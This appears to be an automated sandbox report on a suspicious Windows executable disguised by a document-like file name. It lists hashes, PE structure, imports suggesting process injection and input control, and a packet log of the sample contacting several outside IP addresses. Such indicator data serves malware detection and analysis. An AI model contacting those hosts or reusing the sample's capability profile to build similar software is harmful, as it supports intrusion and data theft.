                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:Document 151-512024.exe
                                                                                                  File size:1'246'208 bytes
                                                                                                  MD5:8e009a43143d3afdde5e91b311e4018b
                                                                                                  SHA1:332f1f946b6aaadecb3de55c5880d0c61021073f
                                                                                                  SHA256:75cdc03e89729226eaefb9259aab9beb4052ddef0280bbf53dcaf8ef9f58d917
                                                                                                  SHA512:2db471514d4720afed163a576b7c25ce6e45bf46c129ce03ebaa1422e588dcbe16a6107fd34fb7606f6b57e0a5623bbe0ce314584ddd060639a1f6e9345daf24
                                                                                                  SSDEEP:24576:YqDEvCTbMWu7rQYlBQcBiT6rprG8a+z74Zcy9xCN6:YTvC/MTQYxsWR7a+vyn
                                                                                                  TLSH:2845CF0273D1C062FFAB92334B5AF65156BC69260123E61F13A81DB9FE701B1563E7A3
                                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                                  Entrypoint:0x420577
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x6631A001 [Wed May 1 01:50:57 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:1
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:1
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:1
                                                                                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                                  Instruction
                                                                                                  call 00007F03A4D2D423h
                                                                                                  jmp 00007F03A4D2CD2Fh
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  mov esi, ecx
                                                                                                  call 00007F03A4D2CF0Dh
                                                                                                  mov dword ptr [esi], 0049FDF0h
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                  mov eax, ecx
                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                  mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                  mov dword ptr [ecx], 0049FDF0h
                                                                                                  ret
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  mov esi, ecx
                                                                                                  call 00007F03A4D2CEDAh
                                                                                                  mov dword ptr [esi], 0049FE0Ch
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                  mov eax, ecx
                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                  mov dword ptr [ecx+04h], 0049FE14h
                                                                                                  mov dword ptr [ecx], 0049FE0Ch
                                                                                                  ret
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, ecx
                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                  and dword ptr [eax], 00000000h
                                                                                                  and dword ptr [eax+04h], 00000000h
                                                                                                  push eax
                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                  add eax, 04h
                                                                                                  push eax
                                                                                                  call 00007F03A4D2FACDh
                                                                                                  pop ecx
                                                                                                  pop ecx
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  lea eax, dword ptr [ecx+04h]
                                                                                                  mov dword ptr [ecx], 0049FDD0h
                                                                                                  push eax
                                                                                                  call 00007F03A4D2FB18h
                                                                                                  pop ecx
                                                                                                  ret
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, ecx
                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                  push eax
                                                                                                  call 00007F03A4D2FB01h
                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                  pop ecx
                                                                                                  Programming Language:
                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x59a00.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x12e0000x7594.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0xd40000x59a000x59a0046d997409972d8739e70ff07ae20cc5cFalse0.9292543802301255data7.8976710287144325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x12e0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0xd44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                  RT_ICON0xd45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                  RT_ICON0xd48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                  RT_ICON0xd49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                  RT_ICON0xd58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                  RT_ICON0xd61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                  RT_ICON0xd66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                  RT_ICON0xd8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                  RT_ICON0xd9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                  RT_STRING0xda1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                                  RT_STRING0xda6dc0x68adataEnglishGreat Britain0.2735961768219833
                                                                                                  RT_STRING0xdad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                                  RT_STRING0xdb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                  RT_STRING0xdb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                  RT_STRING0xdbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                                  RT_STRING0xdc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                  RT_RCDATA0xdc4100x51068data1.0003344582379172
                                                                                                  RT_GROUP_ICON0x12d4780x76dataEnglishGreat Britain0.6610169491525424
                                                                                                  RT_GROUP_ICON0x12d4f00x14dataEnglishGreat Britain1.15
                                                                                                  RT_VERSION0x12d5040x10cdataEnglishGreat Britain0.5970149253731343
                                                                                                  RT_MANIFEST0x12d6100x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                  DLLImport
                                                                                                  WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                  MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                  WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                  IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                  USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                  UxTheme.dllIsThemeActive
                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                                  USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishGreat Britain
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  May 8, 2024 10:49:00.470808983 CEST4971080192.168.2.10154.215.72.110
                                                                                                  May 8, 2024 10:49:00.793301105 CEST8049710154.215.72.110192.168.2.10
                                                                                                  May 8, 2024 10:49:00.793433905 CEST4971080192.168.2.10154.215.72.110
                                                                                                  May 8, 2024 10:49:00.795924902 CEST4971080192.168.2.10154.215.72.110
                                                                                                  May 8, 2024 10:49:01.118930101 CEST8049710154.215.72.110192.168.2.10
                                                                                                  May 8, 2024 10:49:01.118989944 CEST8049710154.215.72.110192.168.2.10
                                                                                                  May 8, 2024 10:49:01.119009972 CEST8049710154.215.72.110192.168.2.10
                                                                                                  May 8, 2024 10:49:01.119231939 CEST4971080192.168.2.10154.215.72.110
                                                                                                  May 8, 2024 10:49:01.125859976 CEST4971080192.168.2.10154.215.72.110
                                                                                                  May 8, 2024 10:49:01.128774881 CEST8049710154.215.72.110192.168.2.10
                                                                                                  May 8, 2024 10:49:01.128851891 CEST4971080192.168.2.10154.215.72.110
                                                                                                  May 8, 2024 10:49:01.329037905 CEST8049710154.215.72.110192.168.2.10
                                                                                                  May 8, 2024 10:49:01.329102039 CEST4971080192.168.2.10154.215.72.110
                                                                                                  May 8, 2024 10:49:01.448523998 CEST8049710154.215.72.110192.168.2.10
                                                                                                  May 8, 2024 10:49:16.644279957 CEST4971180192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:16.934256077 CEST8049711202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:16.934325933 CEST4971180192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:16.936454058 CEST4971180192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:17.225975990 CEST8049711202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:17.237772942 CEST8049711202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:17.291136026 CEST4971180192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:18.042951107 CEST8049711202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:18.043006897 CEST4971180192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:18.447743893 CEST4971180192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:19.466247082 CEST4971280192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:19.756083965 CEST8049712202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:19.756433010 CEST4971280192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:19.758498907 CEST4971280192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:20.048201084 CEST8049712202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:20.048599958 CEST8049712202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:20.103626013 CEST4971280192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:20.858747959 CEST8049712202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:20.858844995 CEST4971280192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:21.260202885 CEST4971280192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:22.278947115 CEST4971380192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:22.566596031 CEST8049713202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:22.566776037 CEST4971380192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:22.568752050 CEST4971380192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:22.858525038 CEST8049713202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:22.858556032 CEST8049713202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:22.859085083 CEST8049713202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:22.900547028 CEST4971380192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:23.672296047 CEST8049713202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:23.672446966 CEST4971380192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:24.072470903 CEST4971380192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:25.091898918 CEST4971480192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:25.376408100 CEST8049714202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:25.376682043 CEST4971480192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:25.378590107 CEST4971480192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:25.663827896 CEST8049714202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:25.664339066 CEST8049714202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:25.664395094 CEST8049714202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:25.664582014 CEST4971480192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:25.667371035 CEST4971480192.168.2.10202.172.28.202
                                                                                                  May 8, 2024 10:49:25.953424931 CEST8049714202.172.28.202192.168.2.10
                                                                                                  May 8, 2024 10:49:31.251336098 CEST4971680192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:31.590007067 CEST8049716116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:31.590137959 CEST4971680192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:31.591990948 CEST4971680192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:31.934046984 CEST8049716116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:31.934181929 CEST4971680192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:33.104266882 CEST4971680192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:34.122440100 CEST4971780192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:34.459553957 CEST8049717116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:34.459687948 CEST4971780192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:34.677815914 CEST4971780192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:35.016516924 CEST8049717116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:35.016642094 CEST4971780192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:36.260507107 CEST4971780192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:37.278528929 CEST4971880192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:37.614696026 CEST8049718116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:37.616384983 CEST4971880192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:37.618297100 CEST4971880192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:37.955087900 CEST8049718116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:38.254314899 CEST8049718116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:38.256304979 CEST4971880192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:39.119410992 CEST4971880192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:40.137943029 CEST4971980192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:40.475804090 CEST8049719116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:40.476052046 CEST4971980192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:40.478224993 CEST4971980192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:40.817634106 CEST8049719116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:40.817837000 CEST4971980192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:40.820617914 CEST4971980192.168.2.10116.50.37.244
                                                                                                  May 8, 2024 10:49:41.158217907 CEST8049719116.50.37.244192.168.2.10
                                                                                                  May 8, 2024 10:49:46.305257082 CEST4972080192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:46.616662979 CEST804972046.30.213.191192.168.2.10
                                                                                                  May 8, 2024 10:49:46.616816044 CEST4972080192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:46.618686914 CEST4972080192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:46.930608034 CEST804972046.30.213.191192.168.2.10
                                                                                                  May 8, 2024 10:49:46.931341887 CEST804972046.30.213.191192.168.2.10
                                                                                                  May 8, 2024 10:49:46.931351900 CEST804972046.30.213.191192.168.2.10
                                                                                                  May 8, 2024 10:49:46.931430101 CEST4972080192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:48.135559082 CEST4972080192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:49.153661013 CEST4972180192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:49.464071989 CEST804972146.30.213.191192.168.2.10
                                                                                                  May 8, 2024 10:49:49.464200020 CEST4972180192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:49.466044903 CEST4972180192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:49.776488066 CEST804972146.30.213.191192.168.2.10
                                                                                                  May 8, 2024 10:49:49.777137041 CEST804972146.30.213.191192.168.2.10
                                                                                                  May 8, 2024 10:49:49.777148962 CEST804972146.30.213.191192.168.2.10
                                                                                                  May 8, 2024 10:49:49.777240992 CEST4972180192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:50.978800058 CEST4972180192.168.2.1046.30.213.191
                                                                                                  May 8, 2024 10:49:51.997698069 CEST4972280192.168.2.1046.30.213.191
